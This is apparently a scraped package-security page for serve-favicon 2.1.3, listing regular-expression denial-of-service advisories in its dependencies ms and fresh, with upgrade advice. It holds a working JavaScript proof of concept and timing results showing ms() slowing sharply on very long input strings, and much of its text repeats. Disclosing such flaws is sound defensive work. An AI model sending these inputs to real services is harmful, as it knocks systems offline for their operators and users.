Version Details and Security Vulnerabilities

📦

serve-favicon

2.1.3

Comparision Betweeen 2.1.3 and 2.1.2

Identify the differences between the current version of the package and the previous one.

Version

Dependencies

Dev Dependencies

Peer Dependencies

Distributed Files

N/A

Unpacked Size

N/A

Security Vulnerabilities

This site is an independent open-source project and is not affiliated with, endorsed by, or sponsored by npm, Inc. or GitHub, Inc. The name “npm” is a registered trademark of npm, Inc., used here solely to describe compatibility and reference publicly available npm package data.

Version Details and Security Vulnerabilities

📦

serve-favicon

2.1.3

Comparision Betweeen 2.1.3 and 2.1.2

Identify the differences between the current version of the package and the previous one.

Version

Dependencies

Dev Dependencies

Peer Dependencies

Distributed Files

N/A

Unpacked Size

N/A

Security Vulnerabilities

Security Details

Comprehensive list of direct or transitive vulnerabilities for version 2.1.3 of the package serve-favicon.

All Security Vulnerabilities

All the vulnerabilities related to the version 2.1.3 of the package

Summary:

Regular Expression Denial of Service in ms

Details:

Versions of ms prior to 0.7.1 are affected by a regular expression denial of service vulnerability when extremely long version strings are parsed.

Proof of Concept

var ms = require('ms');
var genstr = function (len, chr) {
   var result = "";
   for (i=0; i<=len; i++) {
       result = result + chr;
   }

   return result;
}

ms(genstr(process.argv[2], "5") + " minutea");

Results

Showing increase in execution time based on the input string.

$ time node ms.js 10000

real	0m0.758s
user	0m0.724s
sys	0m0.031s

$ time node ms.js 20000

real	0m2.580s
user	0m2.494s
sys	0m0.047s

$ time node ms.js 30000

real	0m5.747s
user	0m5.483s
sys	0m0.080s

$ time node ms.js 80000

real	0m41.022s
user	0m38.894s
sys	0m0.529s

Details about ms@0.6.2

Summary:

Vercel ms Inefficient Regular Expression Complexity vulnerability

Details:

A vulnerability, which was classified as problematic, has been found in vercel ms up to 1.x. This issue affects the function parse of the file index.js. The manipulation of the argument str leads to inefficient regular expression complexity. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 2.0.0 is able to address this issue. The name of the patch is caae2988ba2a37765d055c4eee63d383320ee662. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217451.

Details about ms@0.6.2

Summary:

Regular Expression Denial of Service in fresh

Details:

Affected versions of fresh are vulnerable to regular expression denial of service when parsing specially crafted user input.

Recommendation

Update to version 0.5.2 or later.

Details about fresh@0.2.4

Security Details

Comprehensive list of direct or transitive vulnerabilities for version 2.1.3 of the package serve-favicon.

All Security Vulnerabilities

All the vulnerabilities related to the version 2.1.3 of the package

Summary:

Regular Expression Denial of Service in ms

Details:

Versions of ms prior to 0.7.1 are affected by a regular expression denial of service vulnerability when extremely long version strings are parsed.

Proof of Concept

var ms = require('ms');
var genstr = function (len, chr) {
   var result = "";
   for (i=0; i<=len; i++) {
       result = result + chr;
   }

   return result;
}

ms(genstr(process.argv[2], "5") + " minutea");

Results

Showing increase in execution time based on the input string.

$ time node ms.js 10000

real	0m0.758s
user	0m0.724s
sys	0m0.031s

$ time node ms.js 20000

real	0m2.580s
user	0m2.494s
sys	0m0.047s

$ time node ms.js 30000

real	0m5.747s
user	0m5.483s
sys	0m0.080s

$ time node ms.js 80000

real	0m41.022s
user	0m38.894s
sys	0m0.529s

Details about ms@0.6.2

Summary:

Vercel ms Inefficient Regular Expression Complexity vulnerability

Details:

Details about ms@0.6.2

Summary:

Regular Expression Denial of Service in fresh

Details:

Affected versions of fresh are vulnerable to regular expression denial of service when parsing specially crafted user input.

Recommendation

Update to version 0.5.2 or later.

Details about fresh@0.2.4

Version Details and Security Vulnerabilities

serve-favicon

Comparision Betweeen 2.1.3 and 2.1.2

Security Vulnerabilities

Version Details and Security Vulnerabilities

serve-favicon

Comparision Betweeen 2.1.3 and 2.1.2

Security Vulnerabilities

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

Proof of Concept

Results

Recommendation

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

Proof of Concept

Results

Recommendation

Version Details and Security Vulnerabilities

serve-favicon

Comparision Betweeen 2.1.3 and 2.1.2

Security Vulnerabilities

Version Details and Security Vulnerabilities

serve-favicon

Comparision Betweeen 2.1.3 and 2.1.2

Security Vulnerabilities

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

ms@0.6.2 GHSA-3fx5-fwvr-xrjg 7.5

Proof of Concept

Results

ms@0.6.2 GHSA-w9mr-4mfr-499f 5.3

fresh@0.2.4 GHSA-9qj9-36jm-prpv 7.5

Recommendation

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

ms@0.6.2 GHSA-3fx5-fwvr-xrjg 7.5

Proof of Concept

Results

ms@0.6.2 GHSA-w9mr-4mfr-499f 5.3

fresh@0.2.4 GHSA-9qj9-36jm-prpv 7.5

Recommendation